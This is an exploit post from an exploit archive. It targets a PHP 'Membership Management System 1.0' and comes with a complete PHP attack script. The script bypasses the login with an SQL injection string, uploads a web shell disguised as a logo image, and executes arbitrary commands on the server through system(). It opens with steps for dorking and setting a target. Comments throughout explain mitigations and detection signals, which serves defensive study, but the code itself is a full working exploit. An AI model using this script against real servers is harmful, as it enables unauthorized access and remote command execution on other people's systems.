## https://sploitus.com/exploit?id=PACKETSTORM:181551
=============================================================================================================================================  
| # Title : Membership Management System version 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.  
  
[+] This payload injects PHP code that contains a back door.  
  
[+] Line 20: set your target.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php  
  
[+] payload :  
  
<?php  
// Function to generate a random string of a given length  
// Build a random string drawn from $chars: the pool is repeated until it is at
// least $size characters long, shuffled, and a window starting at offset 1 is
// returned. Because the window starts at offset 1 (not 0), the result is one
// character short of $size whenever $size is an exact multiple of strlen($chars).
// str_shuffle() is not a CSPRNG; fine for a throwaway filename, never for secrets.
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
    $repeats = ceil($size / strlen($chars));
    $pool = str_repeat($chars, $repeats);
    $shuffled = str_shuffle($pool);
    return substr($shuffled, 1, $size);
}
  
// Pick a random name for the PHP file that will be uploaded. The name is not
// derived from anything observable on the server side, so a defender looking
// for this activity should watch for *any* newly created .php file under the
// application's uploads/ directory rather than a fixed filename.
$shellFile = randomGen() . ".php";

// Login form fields. The email value closes the SQL string literal, appends an
// always-true condition and comments out the rest of the query with '#' — the
// classic authentication-bypass shape. The application-side fix is to build the
// login query with a prepared statement and bound parameters, never by string
// concatenation. A login attempt whose email field contains a quote or '#' is
// also a cheap detection signal in the web server / application logs.
$payload = [
'email' => "test@mail.com' or 0=0 #", // Adjust based on the target
'password' => 'a',
'login' => ''
];

// One cURL handle is reused for both requests below, so options set here for
// the login (RETURNTRANSFER, HEADER, VERBOSE) remain in effect for the upload.
$session = curl_init();

// Target base URL (change this to your target IP or domain)
$urlBase = "http://127.0.0.1/Membership/";

// Login
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";

// Set cURL options for the POST request. RETURNTRANSFER makes curl_exec()
// return the response as a string instead of printing it; HEADER keeps the
// status line and response headers in that string so Set-Cookie can be parsed
// below; FOLLOWLOCATION is off, so a post-login redirect (if any) is not
// followed and the first response is what gets inspected.
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging

// Execute the login request. On a transport failure curl_exec() returns false;
// the substr() calls below then coerce it to an empty string, no Set-Cookie is
// found, and the script exits at the check further down.
$response = curl_exec($session);

// Separate headers from body
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size); // not used afterwards; overwritten by the multipart body below

// Capture the "name=value" part of the first Set-Cookie header (everything up to
// the first ';', so attributes such as Path/HttpOnly are dropped). Only the first
// matching header is used; any further cookies set by the application are ignored.
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
$cookie = $matches[1][0];
}

// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;

// The mere presence of a Set-Cookie header is taken as proof of an
// authenticated admin session; nothing verifies that the login actually
// succeeded. An application that issues a session cookie even on a failed
// login would pass this check and the later upload would simply fail.
if ($cookie) {
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
echo "Set-Cookie header not found in the response.\n";
exit();
}

// Prepare to upload shell via the settings page's "logo" form field
$url = $urlBase . "settings.php";

// Get user input for the command to execute. This is read *before* the upload,
// so the prompt blocks here regardless of whether the upload will succeed.
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));

// PHP code to execute the command received from the user. Once this file is
// served from the web root, any request carrying a cmd parameter is passed
// straight to system() — i.e. unauthenticated remote command execution. The
// server-side mitigations for this bug class are: validate the uploaded file
// on the server against an allow-list of image extensions/MIME types (the
// client-supplied filename and Content-Type must not be trusted), store
// uploads outside the document root or in a directory with PHP execution
// disabled, and rename files on save.
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";

// Prepare the multipart/form-data body by hand (rather than using CURLFile),
// which lets the "logo" part carry an arbitrary filename and Content-Type.
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n"; // a literal "$": "\r" cannot begin a variable name, so no interpolation happens
$body .= "--$boundary\r\n";
// The part is named like a logo upload but carries a .php filename …
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
// … and declares itself as PHP rather than an image. For the upload to be
// accepted the server must not be checking either the extension or the
// declared MIME type — exactly the check that closes this hole.
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";

// Set cURL options for file upload. POSTFIELDS is the raw body string, so the
// boundary must be repeated in the Content-Type header; the cookie captured
// from the login response is replayed to act as the logged-in user.
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
'Content-Type: multipart/form-data; boundary=' . $boundary,
'Cookie: ' . $cookie
]);

echo "=== Logging in and uploading shell " . $shellFile . " ===\n";

// Execute the upload request. The response is captured but never inspected,
// so a rejected upload is not detected here — the script proceeds to request
// the file regardless.
$response = curl_exec($session);

// Close cURL session
curl_close($session);

// Request the uploaded file with the command as a query parameter. This relies
// on uploads being stored under uploads/ with the submitted filename and being
// served with PHP execution enabled. file_get_contents() on an http:// URL
// needs allow_url_fopen; on failure it emits a warning and returns false, which
// echo prints as an empty string. A GET to uploads/<random>.php?cmd=… is the
// request shape a defender would look for in access logs.
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";

echo "=== CURL OUTPUT ===\n";
echo file_get_contents($requestUrl);
?>
  
[+]   
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================